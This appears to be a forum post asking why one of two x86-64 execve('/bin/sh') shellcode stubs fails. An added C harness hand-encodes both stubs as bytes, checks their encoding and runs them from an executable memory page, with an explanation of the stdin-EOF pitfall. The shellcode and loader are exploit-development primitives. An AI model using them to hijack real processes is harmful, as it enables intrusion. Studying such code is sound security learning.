20Mar
push /bin/sh to get a shell
I usually use a different method to push /bin/sh into rdi to get a shell, but I wanted to try this one. Assume that I can control RIP and that there are no limitations or filters, so I can execute whatever assembly code I want.
.intel_syntax noprefix
.globl _start
_start:
    mov rax, 0x0068732f6e69622f   # "/bin/sh\0" as a little-endian qword
    push rax                      # the string now lives at [rsp]
    push rsp                      # address of the string ...
    pop rdi                       # ... into rdi (same effect as mov rdi, rsp)
    mov rax, 0x3b                 # SYS_execve on x86-64 Linux
    xor rsi, rsi                  # argv = NULL
    xor rdx, rdx                  # envp = NULL
    syscall

.intel_syntax noprefix
.globl _start
_start:
    lea rdi, [rip + shell]        # rdi = address of the string below
    mov rax, 0x3b                 # SYS_execve on x86-64 Linux
    xor rsi, rsi                  # argv = NULL
    xor rdx, rdx                  # envp = NULL
    syscall
shell:
    .string "/bin/sh"             # NUL-terminated by the directive
While I usually use the above one, I don't get why the first one isn't working. I also used GDB to verify, and everything seems to be good and in the right positions. In addition, I also get this in GDB:
process 8870 is executing new program: /usr/bin/dash.
Why doesn't it work?
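The GDB line above is printed when execve succeeds and the kernel loads the new image, so the first stub does reach the syscall with a usable path. The harness below, added here and not part of the original post, runs either stub as raw bytes outside of any target binary so the two can be compared in isolation, and checks the two things that usually go wrong with this kind of stub: the little-endian immediate that must spell "/bin/sh\0", and the rel32 that `lea rdi, [rip + shell]` must encode so that it lands on the string. The byte encodings are hand-assembled from the listings above; `stack_sh`, `rip_sh`, `sh_immediate` and the other names are this example's own. One general caveat for when a shell "doesn't work" although execve succeeded: if the process's stdin is a pipe that has already reached EOF (typical when the payload is piped into the target), the new shell reads EOF and exits immediately; the harness warns when stdin is not a terminal.

```c
#define _GNU_SOURCE               /* MAP_ANONYMOUS on glibc */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Variant 1 from the post: build "/bin/sh\0" on the stack, rdi = rsp.
 * Bytes hand-assembled from the Intel-syntax listing (this example's own). */
static const unsigned char stack_sh[] = {
    0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, /* mov rax, 0x0068732f6e69622f */
    0x50,                                     /* push rax            */
    0x54,                                     /* push rsp            */
    0x5f,                                     /* pop rdi             */
    0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, /* mov rax, 0x3b       */
    0x48, 0x31, 0xf6,                         /* xor rsi, rsi        */
    0x48, 0x31, 0xd2,                         /* xor rdx, rdx        */
    0x0f, 0x05,                               /* syscall             */
};

/* Variant 2 from the post: rip-relative lea to an inline string. */
static const unsigned char rip_sh[] = {
    0x48, 0x8d, 0x3d, 0x0f, 0x00, 0x00, 0x00, /* lea rdi, [rip + 0x0f] -> shell */
    0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, /* mov rax, 0x3b       */
    0x48, 0x31, 0xf6,                         /* xor rsi, rsi        */
    0x48, 0x31, 0xd2,                         /* xor rdx, rdx        */
    0x0f, 0x05,                               /* syscall             */
    '/', 'b', 'i', 'n', '/', 's', 'h', 0x00,  /* shell: .string "/bin/sh" */
};
#define LEA_LEN 7   /* 48 8d 3d + rel32 */

/* The qword variant 1 loads into rax: x86-64 is little-endian, so the first
 * character of the string becomes the lowest byte of the immediate. */
uint64_t sh_immediate(void)
{
    uint64_t v;
    memcpy(&v, "/bin/sh", sizeof v);  /* the literal's 8th byte is the NUL */
    return v;
}

/* Offset inside rip_sh that `lea rdi, [rip + rel32]` actually points at:
 * rip is the address just past the lea, so target = LEA_LEN + rel32. */
size_t rip_lea_target(void)
{
    int32_t rel32;
    memcpy(&rel32, rip_sh + 3, sizeof rel32);
    return (size_t)((int32_t)LEA_LEN + rel32);
}

/* Does the lea land on a NUL-terminated "/bin/sh" inside the stub? */
int rip_string_ok(void)
{
    size_t off = rip_lea_target();
    return off + 8 <= sizeof rip_sh && memcmp(rip_sh + off, "/bin/sh", 8) == 0;
}

/* NUL count: irrelevant with no filter (the post's assumption), but the first
 * thing to check once the payload has to survive strcpy()/gets(). */
size_t count_nul(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        n += (buf[i] == 0);
    return n;
}

/* Copy a stub into an RWX page and jump to it. If execve succeeds the process
 * image is replaced and this never returns; -1 means mmap or execve failed. */
int run_stub(const unsigned char *code, size_t len)
{
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;
    memcpy(page, code, len);
    void (*entry)(void);
    memcpy(&entry, &page, sizeof entry);  /* avoids the object->function cast */
    entry();
    return -1;  /* only reached if the syscall returned an error */
}

int main(int argc, char **argv)
{
    const unsigned char *code = stack_sh;
    size_t len = sizeof stack_sh;
    if (argc > 1 && strcmp(argv[1], "rip") == 0) {  /* ./harness rip -> variant 2 */
        code = rip_sh;
        len = sizeof rip_sh;
    }
    printf("immediate 0x%016llx, lea target offset %zu (%s), %zu NUL byte(s) in stub\n",
           (unsigned long long)sh_immediate(), rip_lea_target(),
           rip_string_ok() ? "ok" : "BAD", count_nul(code, len));
    if (!isatty(STDIN_FILENO))
        fprintf(stderr, "warning: stdin is not a terminal; a spawned shell will read EOF and exit\n");
    return run_stub(code, len) == 0 ? 0 : 1;
}
```

Run it from an interactive terminal (`./harness` for the stack variant, `./harness rip` for the rip-relative one) and you should land in a shell either way; run it with `echo | ./harness` and execve still succeeds, but the shell exits on EOF before you can type anything, which is the symptom to rule out first when GDB already shows the new program being executed.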